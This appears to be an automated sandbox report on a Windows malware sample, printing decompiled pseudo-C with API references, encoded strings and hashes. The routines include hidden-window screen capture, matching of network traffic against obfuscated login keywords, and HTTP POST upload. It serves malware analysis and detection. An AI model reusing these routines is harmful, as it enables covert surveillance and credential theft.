				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E00407C72(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E0041CA8D(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E0041CA8D(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E0041CA8D(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x4228e4,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E0041CA8D(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E0041CA8D(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x4228e4, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E0041CA8D(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E0041CA8D(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x0041cb6f
0x0041cb7e
0x0041cb85
0x0041cb88
0x0041cb8d
0x0041cb9b
0x0041cb9d
0x0041cba4
0x0041cba4
0x0041cbaa
0x0041cbb8
0x0041cbb8
0x0041cbc5
0x0041cbc8
0x0041cbcb
0x0041cbce
0x0041cbd1
0x0041cbe3
0x0041cc02
0x0041cc05
0x0041cc0a
0x0041cc0c
0x0041cc0f
0x0041cc17
0x0041cc1b
0x0041cc1b
0x0041cc1e
0x0041cc20
0x0041cc28
0x0041cc2c
0x0041cc2c
0x0041cc28
0x0041cc32
0x0041cc35
0x0041cc38
0x0041cc86
0x0041cc3a
0x0041cc41
0x0041cc58
0x0041cc5f
0x0041cc61
0x0041cc64
0x0041cc6c
0x0041cc70
0x0041cc70
0x0041cc73
0x0041cc75
0x0041cc7d
0x0041cc81
0x0041cc81
0x0041cc7d
0x0041cc43
0x0041cc43
0x0041cc43
0x0041cc41
0x0041cc8c
0x0041cc9e
0x0041cca2
0x00000000
0x00000000
0x0041ccb1
0x0041ccb3
0x0041ccbb
0x00000000
0x00000000
0x0041ccc1
0x0041ccc8
0x0041ccce
0x0041ccd3
0x0041cce1
0x0041cce9
0x0041ce64
0x0041cec5
0x0041cea6
0x0041ceaa
0x0041ceb1
0x00000000
0x0041ceb7
0x0041ceca
0x0041ced9
0x0041ced9
0x0041cee5
0x0041ceef
0x0041cef7
0x0041ce9a
0x0041cea1
0x0041cef9
0x0041cef9
0x0041cef9
0x00000000
0x0041cef7
0x0041ce69
0x0041ce78
0x0041ce78
0x0041ce84
0x0041ce94
0x00000000
0x0041ce94
0x0041ccf2
0x0041ccfb
0x0041ccfe
0x0041cd07
0x0041cd0e
0x0041cd1b
0x0041cd1e
0x0041cd21
0x0041cd31
0x0041cd4c
0x0041cd52
0x0041cd61
0x0041cd61
0x0041cd6e
0x0041cd7e
0x0041cd81
0x0041cd86
0x0041cd93
0x0041cd93
0x0041cda1
0x0041cdaa
0x0041cdaa
0x0041cdb4
0x0041ce51
0x0041ce58
0x00000000
0x0041cdba
0x0041cdbd
0x0041cdc7
0x0041cdc7
0x0041cdcb
0x0041cdd2
0x0041cdd8
0x0041cde2
0x0041cde2
0x0041cdef
0x0041cdfb
0x0041ce02
0x0041ce06
0x0041ce09
0x0041ce12
0x0041ce1c
0x0041ce1c
0x0041ce29
0x0041ce2c
0x0041ce31
0x0041ce3e
0x0041ce3e
0x0041ce4c
0x00000000
0x0041ce4c
0x0041cdbf
0x0041cdc5
0x00000000
0x00000000
0x00000000
0x0041cdc5
0x0041cdb4
0x0041ccd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cc8c
0x0041cbe5
0x00000000
0x0041cbe5
0x0041cb8f
0x00000000

APIs

Part of subcall function 00407C72: GetClassNameW.USER32 ref: 00407C8D

GetWindowInfo.USER32 ref: 0041CBDB
SelectObject.GDI32(00000000,?), ref: 0041CEAA
DeleteDC.GDI32(00000000), ref: 0041CEB1
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0041CED9
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 0041CEEF

Strings

<, xrefs: 0041CBD1

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: ecc3a0e2cb270dd507e3a537c5799a3012f381c5f2d63433b0fd11722b1dd01f
Instruction ID: 3022ab70d4d4abe3fc86d58c7efcd7222dedaacc640718fcfd5d917ac2666832
Opcode Fuzzy Hash: ecc3a0e2cb270dd507e3a537c5799a3012f381c5f2d63433b0fd11722b1dd01f
Instruction Fuzzy Hash: 92C16D71D40249AFDF11DFA4DD84EEEBFB9AF05304F04802AF945E6260D7388A84DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00408976, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00408976(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x422a70);
							_t83 = E0040886E(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x02030309;
												__eflags = _t75 - 0x47535a5d;
												if(_t75 == 0x47535a5d) {
													goto L37;
												} else {
													__eflags = _t75 - 0x5642464f;
													if(_t75 == 0x5642464f) {
														goto L37;
													} else {
														__eflags = _t75 - 0x54504259;
														if(_t75 != 0x54504259) {
															__eflags = _t75 - 0x5642575a;
															if(_t75 == 0x5642575a) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x56504a45;
																if(_t75 == 0x56504a45) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E0040FA33(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E00419852( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E00419809( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E0040FA33(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E0040592A(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E0040FA33(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E00416FB8(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E0040890D(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x02030309;
						if(_t60 == 0x5046505c || _t60 == 0x51504259) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E004165E8(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x422a70);
											_t94 = E0040886E(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E004163A8( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E0040890D(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E004088A7(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E004163A8(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x422a70);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x00408976
0x00408989
0x0040898b
0x0040898d
0x00408be4
0x00408be4
0x00408be4
0x004089a7
0x004089aa
0x00408a93
0x00408a93
0x00408a96
0x00000000
0x00408a9c
0x00408aa1
0x00408aaf
0x00408ab3
0x00408ab5
0x00408abb
0x00408abe
0x00408bd5
0x00408bd5
0x00000000
0x00408ac4
0x00408ac4
0x00408ac7
0x00000000
0x00408acd
0x00408acd
0x00408ad0
0x00408ae8
0x00408ae8
0x00408aeb
0x00408af3
0x00408af9
0x00408aff
0x00000000
0x00408b01
0x00408b01
0x00408b07
0x00000000
0x00408b09
0x00408b09
0x00408b0f
0x00408b17
0x00408b1d
0x00408b2b
0x00408b2b
0x00408b2d
0x00000000
0x00408b1f
0x00408b1f
0x00408b25
0x00000000
0x00000000
0x00408b25
0x00000000
0x00000000
0x00000000
0x00408b0f
0x00408b07
0x00408aff
0x00408ad2
0x00408ad2
0x00408ad4
0x00408ad6
0x00408adc
0x00408adc
0x00408ae0
0x00000000
0x00408ae2
0x00408ae2
0x00408ae6
0x00408b11
0x00408b11
0x00408b13
0x00408b2f
0x00408b33
0x00408b34
0x00408b3e
0x00408b46
0x00408b4e
0x00408b54
0x00408b56
0x00408b58
0x00408b5c
0x00408b61
0x00408b63
0x00408b65
0x00408b68
0x00408b8f
0x00408b9a
0x00408ba5
0x00408ba6
0x00408bb2
0x00408bb3
0x00408bba
0x00408bc9
0x00408b6a
0x00408b6a
0x00408b6d
0x00408b71
0x00408b75
0x00408b76
0x00408b7b
0x00408b7e
0x00408b83
0x00408b84
0x00408b86
0x00408b8b
0x00408b8d
0x00000000
0x00000000
0x00408b8d
0x00408b6d
0x00408b68
0x00408b63
0x00408bd1
0x00408bd6
0x00408bd8
0x00000000
0x00000000
0x00000000
0x00408ae6
0x00408ad8
0x00408ad8
0x00408ada
0x00000000
0x00000000
0x00000000
0x00000000
0x00408ada
0x00408ad6
0x00408ad0
0x00408ac7
0x00408abe
0x00408bdd
0x00000000
0x00408bdd
0x004089b0
0x004089b2
0x004089bc
0x004089cd
0x00000000
0x004089d3
0x004089d3
0x004089d5
0x004089d8
0x004089db
0x00000000
0x004089e1
0x004089e1
0x004089e1
0x004089e7
0x00000000
0x00000000
0x004089f1
0x00000000
0x004089f7
0x004089f7
0x004089fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004089fa
0x00000000
0x004089f1
0x004089fe
0x00000000
0x00408a0c
0x00408a17
0x00408a1b
0x00000000
0x00408a21
0x00408a26
0x00408a2b
0x00408a39
0x00408a3d
0x00408a55
0x00408a55
0x00408a58
0x00408a5d
0x00408a70
0x00408a75
0x00408a5f
0x00408a63
0x00408a68
0x00408a68
0x00408a7b
0x00408a3f
0x00408a47
0x00408a4b
0x00000000
0x00408a4d
0x00408a4e
0x00408a4e
0x00408a4b
0x00408a7d
0x00408a81
0x00408a86
0x00408a8c
0x00408a8c
0x00408a1b
0x004089fe
0x004089db
0x00000000
0x00000000
0x00000000
0x004089bc
0x004089aa
0x00408be6
0x00408bec

APIs

EnterCriticalSection.KERNEL32(00422A70,0000FDE9,?), ref: 00408A2B
LeaveCriticalSection.KERNEL32(00422A70,?,000000FF), ref: 00408A86
EnterCriticalSection.KERNEL32(00422A70), ref: 00408AA1
getpeername.WS2_32 ref: 00408B4E

Strings

YBPQ, xrefs: 004089BE
OFBV, xrefs: 00408B01
YBPT, xrefs: 00408B09
EJPV, xrefs: 00408B1F
D, xrefs: 00408AE2
U, xrefs: 00408A55
ZWBV, xrefs: 00408B17
W, xrefs: 00408ADC
\PFP, xrefs: 004089B7
, xrefs: 004089C9
]ZSG, xrefs: 00408AF9

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: $D$EJPV$OFBV$U$W$YBPQ$YBPT$ZWBV$\PFP$]ZSG
API String ID: 1099368488-3470239646
Opcode ID: 599b3a7933275f77041fb80adb324b488d4c1f25bb899bd5c2395e40c2722bb1
Instruction ID: c55d6541f01d3a8453908545f3494c37656a575ac9efad2927a9ec29ab361fca
Opcode Fuzzy Hash: 599b3a7933275f77041fb80adb324b488d4c1f25bb899bd5c2395e40c2722bb1
Instruction Fuzzy Hash: EB513471A04305AEDF30AA248E85BAB77A05B41714F14453FF9D4BB2D1DE3DE8819B4E

Uniqueness

Uniqueness Score: -1.00%

Function 00407CD9, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407CD9(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v9;
				struct HDC__* _v16;
				char _v20;
				short _v128;
				void* _v138;
				char _v616;
				char _v1039;
				char _v1408;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E0041645B(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E0040ED80(0x84889911,  &_v128, 0);
					_t66 = RegisterWindowMessageW( &_v128);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E0040ED80(0x84889912,  &_v128, 1);
					_t71 = CreateEventW(0x422bd0, 1, 0,  &_v128);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E0040ED80(0x18782822,  &_v128, 1);
					_t75 = CreateMutexW(0x422bd0, 0,  &_v128);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E0040ED80(0x9878a222,  &_v128, 1);
					_t79 = CreateFileMappingW(0, 0x422bd0, 4, 0, 0x3d09128,  &_v128);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v9 = 0;
					_t82 = GetDC(0);
					_v16 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v9;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v16, 0xa);
					_t21 =  &(_t124[0xb]); // 0x0
					_t118 =  *_t21;
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v16,  *_t21, _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x422900
						_t87 = E0041C948(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v16);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v20;
						_t90 =  *(_v20 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t33 =  &(_t124[0xb]); // 0x0
						_t92 = (_t90 & 0x000000ff) *  *_t33;
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E004163A8(_t119);
						__eflags = _a4 - 1;
						_v9 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v9 = 0;
						E0040F05A( &_v1408);
						E0040F087(_t119,  &_v616);
						_t43 =  &(_t124[0xf]); // 0x42291c
						E004163E4(_t43, 0x422e10, 0x10);
						_t124[0x13] = _v138;
						_t47 =  &(_t124[0x14]); // 0x422930
						E004163E4(_t47,  &_v1039, 0x102);
						E0040ED80(0x1898b122,  &_v128, 1);
						_t107 = CreateMutexW(0x422bd0, 0,  &_v128);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t55 =  &(_t124[0x55]); // 0x0
									_t112 = SelectObject( *_t55, _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v9 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x00407cd9
0x00407cd9
0x00407ced
0x00407cf2
0x00407cf8
0x00407cfe
0x00407d11
0x00407d1a
0x00407d20
0x00407d23
0x00407d25
0x00000000
0x00000000
0x00407d32
0x00407d44
0x00407d4a
0x00407d4d
0x00407d4f
0x00000000
0x00000000
0x00407d5c
0x00407d67
0x00407d6d
0x00407d70
0x00407d72
0x00000000
0x00000000
0x00407d7f
0x00407d92
0x00407d98
0x00407d9a
0x00407d9c
0x00000000
0x00000000
0x00407da8
0x00407dae
0x00407db0
0x00000000
0x00000000
0x00407db6
0x00407dbf
0x00407dc2
0x00407dc5
0x00407dcb
0x00407dce
0x00407dd0
0x00407f3b
0x00000000
0x00407f3b
0x00407ddf
0x00407de2
0x00407dec
0x00407def
0x00407df1
0x00407df1
0x00407dff
0x00407e04
0x00407e06
0x00407e1d
0x00407e1d
0x00407e08
0x00407e0b
0x00407e16
0x00407e16
0x00407e22
0x00407e26
0x00407e2c
0x00407e2f
0x00407e35
0x00407e3c
0x00407e40
0x00407e46
0x00407e46
0x00407e4a
0x00407e4d
0x00407e4f
0x00407e54
0x00407e54
0x00407e54
0x00407e58
0x00407e5b
0x00407e60
0x00407e64
0x00407e68
0x00000000
0x00000000
0x00407e74
0x00407e77
0x00407e83
0x00407e8f
0x00407e93
0x00407e9e
0x00407ead
0x00407eb1
0x00407ec1
0x00407ed0
0x00407ed6
0x00407edc
0x00407ede
0x00000000
0x00000000
0x00407ee5
0x00407eeb
0x00407eee
0x00407ef0
0x00407ef3
0x00407ef9
0x00407eff
0x00407f01
0x00407f0a
0x00407f0c
0x00407f12
0x00407f14
0x00407f17
0x00407f1d
0x00407f23
0x00407f29
0x00407f2b
0x00407f2d
0x00407f2d
0x00407f2b
0x00407f14
0x00407f35
0x00407f35
0x00407ef0
0x00000000
0x00407e2f
0x00407d00
0x00000000

APIs

TlsAlloc.KERNEL32(004228E0,00000000,0000018C,00000000,00000000), ref: 00407CF2
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 00407D1A
CreateEventW.KERNEL32(00422BD0,00000001,00000000,?,84889912,?,00000001), ref: 00407D44
CreateMutexW.KERNEL32(00422BD0,00000000,?,18782822,?,00000001), ref: 00407D67
CreateFileMappingW.KERNEL32(00000000,00422BD0,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00407D92
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00407DA8
GetDC.USER32(00000000), ref: 00407DC5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00407DE5
GetDeviceCaps.GDI32(?,0000000A), ref: 00407DEF
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 00407E02

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID:
API String ID: 3765073151-0
Opcode ID: f6815b2bc375ad3db812a6cee099843ae513234d81b6bd9e75353da428c22d98
Instruction ID: 471e7765bfdfc757ba16c1d8bfa312713de6099d43fa0998822160b3af984389
Opcode Fuzzy Hash: f6815b2bc375ad3db812a6cee099843ae513234d81b6bd9e75353da428c22d98
Instruction Fuzzy Hash: 0B7130B1900649AFDB209FB1CD85AAFB7ACEF08344F10483EF951E2691D279A9448F65

Uniqueness

Uniqueness Score: -1.00%

Function 0041534F, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041534F(intOrPtr* _a4) {
				char _v532;
				void* _v536;
				short _v540;
				char* _v552;
				void* _v568;
				char _v570;
				char _v572;
				char _v576;
				char* _v580;
				void* _v592;
				char _v596;
				char _v600;
				void* _v620;
				void* _v624;
				void* _v628;
				char* _v632;
				long _v648;
				void _v652;
				intOrPtr _v656;
				char _v668;
				intOrPtr _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t99;
				char* _t101;
				intOrPtr* _t109;
				void* _t113;
				intOrPtr* _t114;
				signed int _t120;
				void* _t122;

				_t122 = (_t120 & 0xfffffff8) - 0x224;
				_t109 = _a4;
				if(E0041AE08( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x422e0c, 0, 0, 0, 0);
				_v536 = _t53;
				if(_t53 == 0) {
					L24:
					E004163A8(_v552);
					E004163A8(_v552);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
				_v592 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v568);
					goto L24;
				}
				_t58 =  *_t109;
				_t101 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t101 = "GET";
				}
				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v620 = _t99;
				if(_t99 == 0) {
					L22:
					InternetCloseHandle(_v624);
					goto L23;
				} else {
					E0040F087(_t101,  &_v576);
					_t63 = 0xe;
					E0040F9FD(_t63,  &_v600);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E0041716C( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
						_t122 = _t122 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
							E004163A8(_v648);
						}
					}
					_t67 = 0xf;
					E0040F9FD(_t67,  &_v596);
					_v628 = E00416EF7( &_v572);
					_t113 = E00416378(2 + _t69 * 6);
					if(_t113 == 0) {
						_t113 = 0;
					} else {
						E0041B133(_t113,  &_v572, _v628);
						_t99 = _v628;
					}
					if(_t113 != 0 && E0041716C( &_v632,  &_v596, _t113) > 0) {
